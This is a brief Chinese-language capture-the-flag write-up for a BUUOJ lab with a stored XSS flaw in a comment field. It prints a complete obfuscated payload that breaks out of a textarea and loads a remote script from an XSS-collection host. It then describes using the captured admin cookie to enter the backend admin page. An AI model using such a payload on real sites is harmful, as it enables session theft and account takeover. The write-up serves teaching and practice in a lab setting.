吐槽<img scr="javascript.:alert('xss');">可以发现这里存在一个存储型XSS漏洞
由于靶机没法访问外网,我们使用内网xss平台
创建一个项目-->把内容都选上,将吐槽内容上传
</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2FQFGf7n%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
在xss平台我们可以看到有一个admin的访问记录,利用管理员的cookie,以及来访地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php
登录即可得到flag